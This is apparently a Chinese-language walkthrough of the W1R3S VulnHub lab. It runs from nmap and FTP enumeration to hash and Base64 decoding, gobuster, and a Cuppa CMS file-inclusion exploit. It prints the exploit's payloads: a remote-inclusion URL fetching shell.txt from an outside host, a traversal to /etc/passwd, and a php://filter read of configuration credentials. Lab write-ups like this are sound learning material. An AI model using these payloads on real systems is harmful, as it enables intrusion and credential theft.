一、主机发现
先查看本机与靶机所在网段,这里是eth1网卡是和靶机在同一网段,所以只查看eth1就行了
┌──(kali㉿kali)-[~]└─$ ifconfigeth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.16.128 netmask 255.255.255.0 broadcast 192.168.16.255inet6 fe80::20c:29ff:fe0a:61a4 prefixlen 64 scopeid 0x20<link>ether 00:0c:29:0a:61:a4 txqueuelen 1000 (Ethernet)RX packets 14 bytes 2560 (2.5 KiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 35 bytes 3250 (3.1 KiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
先用arp-scan或者nmap扫一下eth1网段的存活主机,这两个工具探测出的靶机ip是192.168.15.129
| 命令 | 参数 | 介绍 |
|---|---|---|
|
|
|
eth1 接口扫描本地网络中的设备,并显示它们的 IP 和 MAC 地址。 |
|
|
|
-l
--localnet 选项会自动检测 eth1 接口的 IP 地址和子网掩码,并扫描整个本地子网。 |
|
|
|
|
┌──(kali㉿kali)-[~]└─$ sudo arp-scan --interface=eth1 -lInterface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.16.1 00:50:56:c0:00:08 (Unknown)192.168.16.2 00:50:56:f8:96:9c (Unknown)192.168.16.129 00:0c:29:37:f4:3d (Unknown)192.168.16.254 00:50:56:fb:ab:2b (Unknown)4 packets received by filter, 0 packets dropped by kernelEnding arp-scan 1.10.0: 256 hosts scanned in 1.874 seconds (136.61 hosts/sec). 4 responded┌──(kali㉿kali)-[~]└─$ sudo nmap -sn 192.168.16.0/24Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 09:30 CSTNmap scan report for 192.168.16.1Host is up (0.00019s latency).MAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 192.168.16.2Host is up (0.000082s latency).MAC Address: 00:50:56:F8:96:9C (VMware)Nmap scan report for 192.168.16.129Host is up (0.000071s latency).MAC Address: 00:0C:29:37:F4:3D (VMware)Nmap scan report for 192.168.16.254Host is up (0.00015s latency).MAC Address: 00:50:56:FB:AB:2B (VMware)Nmap scan report for 192.168.16.128Host is up.Nmap done: 256 IP addresses (5 hosts up) scanned in 5.94 seconds
二、信息收集
接下来就是探测靶机上开放了哪些端口
| 参数 | 介绍 |
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.16.129 -oA protsStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 09:43 CSTNmap scan report for 192.168.16.129Host is up (0.00030s latency).Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http3306/tcp open mysqlMAC Address: 00:0C:29:37:F4:3D (VMware)Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
在遇到扫描结果有很多端口时,我们最好把探测的端口使用字符处理命令把端口号处理好后,再赋值给一个变量,方便调用
| 命令 | 参数 | 解释 |
|---|---|---|
|
|
|
|
|
|
|
/ 作为分隔符,提取每行的第一个字段(即端口号) |
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ grep open prots.nmap | awk -F '/''{print $1}' | paste -sd ','21,22,80,3306┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ prots=$(grep open prots.nmap | awk -F '/''{print $1}' | paste -sd ',')┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ echo$prots21,22,80,3306
知道靶机的端口号后,就可以进行更细致的探测了,使用默认扫描脚本获取目标端口运行的服务和操作系统信息。ftp服务探测到了三个可访问目录,并提示可以使用anonymous用户登录ftp,nmap进行大胆猜测Linux的版本是Linux 3.10 - 4.11
| 端口 | 服务 | 描述 |
|---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sT -sV -sC -O -p$prots //在输入要扫描的端口时,输入变量$prots然后按Tab键补全会自动将变量转换为其存储的端口┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.16.129 -oA detailStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 15:15 CSTNmap scan report for 192.168.16.129Host is up (0.00052s latency).PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.0.8 or later| ftp-syst:| STAT:| FTP server status:| Connected to ::ffff:192.168.16.128| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeoutin seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 4| vsFTPd 3.0.3 - secure, fast, stable|_End of status| ftp-anon: Anonymous FTP login allowed (FTP code 230)| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works3306/tcp open mysql MySQL (unauthorized)MAC Address: 00:0C:29:37:F4:3D (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purpose|storage-miscRunning (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.16 - 4.6 (91%), Linux 4.10 (91%), Linux 4.4 (91%), Linux 2.6.32 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.8 (91%), Linux 5.0 - 5.4 (91%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopService Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 23.03 seconds
再使用udp协议扫描常见的top20端口。结果都是打开或过滤状态
| 参数 | 介绍 |
|---|---|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap -sU -top-ports 20 192.168.16.129 -oA unpscanStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 15:17 CSTNmap scan report for 192.168.16.129Host is up (0.00025s latency).PORT STATE SERVICE53/udp open|filtered domain67/udp open|filtered dhcps68/udp open|filtered dhcpc69/udp open|filtered tftp123/udp open|filtered ntp135/udp open|filtered msrpc137/udp open|filtered netbios-ns138/udp open|filtered netbios-dgm139/udp open|filtered netbios-ssn161/udp open|filtered snmp162/udp open|filtered snmptrap445/udp open|filtered microsoft-ds500/udp open|filtered isakmp514/udp open|filtered syslog520/udp open|filtered route631/udp open|filtered ipp1434/udp open|filtered ms-sql-m1900/udp open|filtered upnp4500/udp open|filtered nat-t-ike49152/udp open|filtered unknownMAC Address: 00:0C:29:37:F4:3D (VMware)Nmap done: 1 IP address (1 host up) scanned in 3.85 seconds
再用nmap的漏洞扫描脚本来探测靶机可能存在的漏洞。扫到了一个“/wordpress/wp-login.php”登录页面
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo nmap --script=vuln -p21,80,22,3306 192.168.16.129 -oA vulnStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 16:03 CSTPre-scan script results:| broadcast-avahi-dos:| Discovered hosts:| 224.0.0.251| After NULL UDP avahi packet DoS (CVE-2011-1002).|_ Hosts are all up (not vulnerable).Nmap scan report for 192.168.16.129Host is up (0.00026s latency).PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.|_http-dombased-xss: Couldn't find any DOM based XSS.|_http-csrf: Couldn't find any CSRF vulnerabilities.| http-slowloris-check:| VULNERABLE:| Slowloris DOS attack| State: LIKELY VULNERABLE| IDs: CVE:CVE-2007-6750| Slowloris tries to keep many connections to the target web server open and hold| them open as long as possible. It accomplishes this by opening connections to| the target web server and sending a partial request. By doing so, it starves| the http server's resources causing Denial Of Service.|| Disclosure date: 2009-09-17| References:| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750|_ http://ha.ckers.org/slowloris/| http-enum:|_ /wordpress/wp-login.php: Wordpress login page.3306/tcp open mysqlMAC Address: 00:0C:29:37:F4:3D (VMware)Nmap done: 1 IP address (1 host up) scanned in 348.15 seconds
再搜集完关键服务和系统信息后,我们先排个攻击顺序,先查看ftp服务器中的三个可访问目录有什么,然后
三、寻找漏洞
使用anonymous用户登录ftp服务器,登录成功后提示我们将文件传输模式改为二进制模式"binary",使用"?"命令查看当前用户可以使用的命令,查看当前目录文件,是nmap扫描到的那三个目录,进入到content目录查看里面的文件,发现有三个txt文件,使用prompt关闭交互提示方便后面下载文件,使用mget下载文件到本地,另外两个目录中的文件也全都下载下来
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$sudo ftp 192.168.16.129Connected to 192.168.16.129.220 Welcome to W1R3S.inc FTP service.Name (192.168.16.129:kali): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> binary200 Switching to Binary mode.ftp> ?Commands may be abbreviated. Commands are:! edit lpage nlist rcvbuf struct$ epsv lpwd nmap recv suniqueaccount epsv4 ls ntrans reget systemappend epsv6 macdef open remopts tenexascii exit mdelete page rename throttlebell features mdir passive reset tracebinary fget mget pdir restart typebye form mkdir pls rhelp umaskcase ftp mls pmlsd rmdirunsetcd gate mlsd preserve rstatus usagecdup get mlst progress runique userchmod glob mode prompt send verboseclose hash modtime proxy sendport xferbufcr help more put set ?debug idle mput pwd sitedelete image mreget quit sizedir lcd msend quote sndbufdisconnect less newer rate statusftp> ls229 Entering Extended Passive Mode (|||45744|)150 Here comes the directory listing.drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 contentdrwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docsdrwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees226 Directory send OK.ftp> cd content250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||46277|)150 Here comes the directory listing.-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt226 Directory send OK.ftp> promptInteractive mode off.ftp> mget *.txtlocal: 01.txt remote: 01.txt229 Entering Extended Passive Mode (|||42538|)150 Opening BINARY mode data connection for 01.txt (29 bytes).100% |**********************************************************| 29 52.44 KiB/s 00:00 ETA226 Transfer complete.29 bytes received in 00:00 (33.31 KiB/s)local: 02.txt remote: 02.txt229 Entering Extended Passive Mode (|||40061|)150 Opening BINARY mode data connection for 02.txt (165 bytes).100% |**********************************************************| 165 367.04 KiB/s 00:00 ETA226 Transfer complete.165 bytes received in 00:00 (234.88 KiB/s)local: 03.txt remote: 03.txt229 Entering Extended Passive Mode (|||42627|)150 Opening BINARY mode data connection for 03.txt (582 bytes).100% |**********************************************************| 582 1.37 MiB/s 00:00 ETA226 Transfer complete.582 bytes received in 00:00 (897.88 KiB/s)ftp> cd ..250 Directory successfully changed.ftp> cd docs250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||46023|)150 Here comes the directory listing.-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt226 Directory send OK.ftp> mget worktodo.txtlocal: worktodo.txt remote: worktodo.txt229 Entering Extended Passive Mode (|||40641|)150 Opening BINARY mode data connection for worktodo.txt (138 bytes).100% |**********************************************************| 138 114.30 KiB/s 00:00 ETA226 Transfer complete.138 bytes received in 00:00 (93.91 KiB/s)ftp> cd ..250 Directory successfully changed.ftp> cd new-employees250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||41133|)150 Here comes the directory listing.-rw-r--r-- 1 ftp ftp 155 Jan 28 2018 employee-names.txt226 Directory send OK.ftp> mget employee-names.txtlocal: employee-names.txt remote: employee-names.txt229 Entering Extended Passive Mode (|||44320|)150 Opening BINARY mode data connection for employee-names.txt (155 bytes).100% |**********************************************************| 155 156.37 KiB/s 00:00 ETA226 Transfer complete.155 bytes received in 00:00 (122.76 KiB/s)ftp>
查看刚才下载下来的文件内容,先看三个txt文件的内容,第一行“New FTP Server For W1R3S.inc(新的 FTP 服务器用于 电线公司)”中的"W1R3S"是英文单词"wires",为什么要这样拼写呢?这要讲到一个互联网文化“leetspeak”,详细故事请点击连接了解
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ cat *.txtNew FTP Server For W1R3S.inc########01ec2d8fc11c493b25029fb1f47f39ce#############SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==############################################___________.__ __ __ ______________________ _________ .____ ___/| |__ ____ / / /_ ______ _____ / _____/ |__| ____ ____| | | | _/ __ // / | || _/ _(__ < _____ | |/ _/ ___| | | Y ___/ / | || | / / | | | ___|____| |___| /___ > __/ / |___||____|_ /______ /_______ / / |__|___| /___ >/ / / / / / / / /The W1R3S.inc employee listNaomi.W - ManagerHector.A - IT DeptJoseph.G - Web DesignAlbert.O - Web DesignGina.L - InventoryRico.D - Human Resourcesı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ观察下面这串加密的的字符特征为32为十六进制数,可知其为md5加密的字符串如果不确定可以使用“hash-identifier”检测一下01ec2d8fc11c493b25029fb1f47f39ce┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ hash-identifier########################################################################## __ __ __ ______ _____ ## / / / /__ _ / _ ` ## _ __ ____ ___ /_/ / / ## _ /'__` / ,__ _ ` ## / _ _/__, ` _ __ _ ## _ _ ___ _/____/ _ _ /_____ ____/ ## /_//_//__//_//___/ /_//_/ /_____/ /___/ v1.2 ## By Zion3R ## www.Blackploit.com ## [email protected] ##########################################################################--------------------------------------------------HASH: 01ec2d8fc11c493b25029fb1f47f39cePossible Hashs:[+] MD5[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))Least Possible Hashs:[+] RAdmin v2.x[+] NTLM[+] MD4[+] MD2[+] MD5(HMAC)[+] MD4(HMAC)[+] MD2(HMAC)[+] MD5(HMAC(Wordpress))[+] Haval-128[+] Haval-128(HMAC)[+] RipeMD-128[+] RipeMD-128(HMAC)[+] SNEFRU-128[+] SNEFRU-128(HMAC)[+] Tiger-128[+] Tiger-128(HMAC)[+] md5($pass.$salt)[+] md5($salt.$pass)[+] md5($salt.$pass.$salt)[+] md5($salt.$pass.$username)[+] md5($salt.md5($pass))[+] md5($salt.md5($pass))[+] md5($salt.md5($pass.$salt))[+] md5($salt.md5($pass.$salt))[+] md5($salt.md5($salt.$pass))[+] md5($salt.md5(md5($pass).$salt))[+] md5($username.0.$pass)[+] md5($username.LF.$pass)[+] md5($username.md5($pass).$salt)[+] md5(md5($pass))[+] md5(md5($pass).$salt)[+] md5(md5($pass).md5($salt))[+] md5(md5($salt).$pass)[+] md5(md5($salt).md5($pass))[+] md5(md5($username.$pass).$salt)[+] md5(md5(md5($pass)))[+] md5(md5(md5(md5($pass))))[+] md5(md5(md5(md5(md5($pass)))))[+] md5(sha1($pass))[+] md5(sha1(md5($pass)))[+] md5(sha1(md5(sha1($pass))))[+] md5(strtoupper(md5($pass)))--------------------------------------------------
将md5字符串存储再“md5.hash”中,然后使用john撞库尝试破解
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ vim md5.hash┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo john md5.hashCreated directory: /root/.johnWarning: detected hashtype"LM", but the string is also recognized as "dynamic=md5($p)"Use the "--format=dynamic=md5($p)" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "HAVAL-128-4"Use the "--format=HAVAL-128-4" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "MD2"Use the "--format=MD2" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "mdc2"Use the "--format=mdc2" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "mscash"Use the "--format=mscash" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "mscash2"Use the "--format=mscash2" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "NT"Use the "--format=NT" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-MD4"Use the "--format=Raw-MD4" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-MD5"Use the "--format=Raw-MD5" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-MD5u"Use the "--format=Raw-MD5u" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Raw-SHA1-AxCrypt"Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "ripemd-128"Use the "--format=ripemd-128" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "Snefru-128"Use the "--format=Snefru-128" option to force loading these as that type insteadWarning: detected hashtype"LM", but the string is also recognized as "ZipMonster"Use the "--format=ZipMonster" option to force loading these as that type insteadUsing default input encoding: UTF-8Using default target encoding: CP850Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])Warning: poor OpenMP scalability for this hashtype, consider --fork=12Will run 12 OpenMP threadsProceeding with single, rules:SinglePress 'q' or Ctrl-C to abort, almost any other key for statusAlmost done: Processing the remaining buffered candidate passwords, if any.Proceeding with wordlist:/usr/share/john/password.lstProceeding with incremental:LM_ASCII0g 0:00:01:39 0.06% 3/3 (ETA: 2025-03-22 16:52) 0g/s 44475Kp/s 44475Kc/s 88951KC/s ARL3P98..ARBD5TESession aborted
过了很久也没有爆出来结果,那我们就用浏览器上网搜一个MD5在线破解工具看看能不能爆破一下。这次使用在线工具破解出来了,结果说这不是密码,请时刻保持怀疑的态度,把这个明文记下来
| md5 | 明文 |
|---|---|
|
|
|
接下来就是第三个字符串了,根据我一坤年的ctf经验来看,这是一个Base64字符串,是不是,解🐎一下就知道了,果然是的哈
| Base64 | 明文 |
|---|---|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ echo"SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -dIt is easy, but not that easy..
接下来就是这个由ascii码生成的符号拼接起来的公司的logo,感兴趣可以看看这个网站
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ cat 03.txt___________.__ __ __ ______________________ _________ .____ ___/| |__ ____ / / /_ ______ _____ / _____/ |__| ____ ____| | | | _/ __ // / | || _/ _(__ < _____ | |/ _/ ___| | | Y ___/ / | || | / / | | | ___|____| |___| /___ > __/ / |___||____|_ /______ /_______ / / |__|___| /___ >/ / / / / / / / /
再后面有个公司员工列表,人员列表无论在什么时候都很重要,记下来
| 名称 | 职位 |
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
The W1R3S.inc employee listNaomi.W - ManagerHector.A - IT DeptJoseph.G - Web DesignAlbert.O - Web DesignGina.L - InventoryRico.D - Human Resources
最后是两句话是进行了上下翻转和倒叙,我们去浏览器找找有没有在线工具 ,然后我使用的是DeepSeek将其还原了
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ以下是翻译后的句子:第一句:我不认为这是获取 root 权限的方法!(原句:`I don`t think this is the way to root!`)第二句:我们有很多工作要做,别玩了....(原句:`we have a lot of work to do, stop playing around....`)
目前21端口的这些信息提示我们不让我们继续在21端口这里探测,那我们就去看看3306端口的mysql服务有没有什么惊喜,尝试使用root用户经行空密码登录失败
| 参数 | 介绍 |
|---|---|
|
|
|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo mysql -h 192.168.16.129 -u root -pEnter password:ERROR 1130 (HY000): Host '192.168.16.128' is not allowed to connect to this MySQL server
既然3306端口不行,那就去查看80端口上的服务是什么,访问后发现是个Apache的默认页面,查看其内容没有什么有用的信息
再看一下源代码中有没有什么,也没有有用的信息
使用gobuster扫描目录能不能找到敏感目录,成功获取了三个目录,看看里面有什么
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo gobuster dir -u http://192.168.16.129/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt[sudo] kali 的密码:===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.16.129/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/wordpress (Status: 301) [Size: 320] [--> http://192.168.16.129/wordpress/]/javascript (Status: 301) [Size: 321] [--> http://192.168.16.129/javascript/]/administrator (Status: 301) [Size: 324] [--> http://192.168.16.129/administrator/]/server-status (Status: 403) [Size: 302]Progress: 220560 / 220561 (100.00%)===============================================================Finished===============================================================
wordpress无法访问
javascript只显示出了中间件版本、操作系统的ip地址和端口
访问administrator是个框架程序管理安装的页面,里面是检测安装环境是否满足安装条件,框架是“Cuppa CMS”,我们点击“Next”按键继续下一步
跳转到数据库创建页面了
设置数据库用户名和密码为“litemao”,设置email为“[email protected]”,然后再点击“next”继续安装
配置文件和数据表格都成功创建了,但是administrator用户并没有创建成功,而且只有一个“Back”按钮,先看一下页面源代码有没有东西,没有有用的信息,点击"Back"按钮返回
那就使用searchsploit命令在本地搜索一下cuppa的历史漏洞
searchsploit允许用户通过关键词(如软件名称、操作系统、漏洞类型等)在本地 ExploitDB 数据库中搜索公开的漏洞利用代码。找到了一个
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ searchsploit cuppa----------------------------------------------------------------------- ----------------------Exploit Title | Path----------------------------------------------------------------------- ----------------------Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion |php/webapps/25971.txt----------------------------------------------------------------------------------------------Shellcodes: No Results把25971.txt下载到本地┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ searchsploit cuppa -m 25971[!] Could not find EDB-ID #Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File InclusionURL: https://www.exploit-db.com/exploits/25971Path: /usr/share/exploitdb/exploits/php/webapps/25971.txtCodes: OSVDB-94101Verified: TrueFile Type: C++ source, ASCII text, with very long lines (876)cp: cannot create regular file '/home/kali/'$'351235266346234272344277241346201257''/vlunhub/W1R3S/25971.txt': Permission deniedCopied to: /home/kali/靶机信息/vlunhub/W1R3S/25971.txt看一下25971.txt内容,漏洞描述为该漏洞为文件包含漏洞,并且无论是在linux和windows运行的cuppa都样适用,漏洞是在alertConfigField.php文件中的第22行的产生的┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ cat 25971.txtExploit Title : Cuppa CMS File InclusionDate : 4 June 2013Exploit Author : CWH UndergroundSite : www.2600.in.thVendor Homepage : http://www.cuppacms.com/Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zipVersion : BetaTested on : Window and Linux,--^----------,--------,-----,-------^--,| ||||||||| --------' | O .. CWH Underground Hacking Team ..+---------------------------^----------|_,-------, _________________________|/ XXXXXX /| // XXXXXX / // XXXXXX /______(/ XXXXXX // XXXXXX /(________(------'VULNERABILITY: PHP CODE INJECTION/alerts/alertConfigField.php (LINE: 22)-----------------------------------------------------------------------------LINE 22:<?php include($_REQUEST["urlConfig"]); ?>-----------------------------------------------------------------------------DESCRIPTIONAn attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]EXPLOIThttp://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwdMoreover, We could access Configuration.php source code via PHPStreamFor Example:-----------------------------------------------------------------------------http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php-----------------------------------------------------------------------------Base64 Encode Output:-----------------------------------------------------------------------------PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+-----------------------------------------------------------------------------Base64 Decode Output:-----------------------------------------------------------------------------<?phpclass Configuration{public $host = "localhost";public $db = "cuppa";public $user = "root";public $password = "Db@dmin";public $table_prefix = "cu_";public $administrator_template = "default";public $list_limit = 25;public $token = "OBqIPqlFWf3X";public $allowed_extensions = ".bmp; .csv; .doc; .gif; .ico; .jpg; .jpeg; .odg; .odp; .ods; .odt; .pdf; .png; .ppt; .swf; .txt; .xcf; .xls; .docx; .xlsx";public $upload_default_path = "media/uploadsFiles";public $maximum_file_size = "5242880";public $secure_login = 0;public $secure_login_value = "";public $secure_login_redirect = "";}?>-----------------------------------------------------------------------------Able to read sensitive information via File Inclusion (PHP Stream)Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2################################################################################################################
根据Exp提供的路径,我们可以尝试读取passwd文件,不过在以下这个路径中,只有alarts是可以确定的,但是前面的路径经过尝试是访问不了的,试了一下路径是administator/cuppa/alerts/alertConfigField.php可以访问的,但是没有成功读取passwd的内容
不可访问路径http://targetIP/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd可访问路径http://192.168.16.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
不知道是那里出问题了,原本想用exp提供的第三方网站来下载cuppa_cms的源代码,但是访问不到,那就直接用浏览器搜吧。查看漏洞所在位置,是传参方式出问题了,在这个地方使用的是POST方式接收参数的
知道是哪里出问题了就好解决了,接下来我们使用curl命令来经行POST传参,参数需要经行base64编码。执行命令后成功读取了passwd的内容
| 参数 | 介绍 |
|---|---|
|
|
|
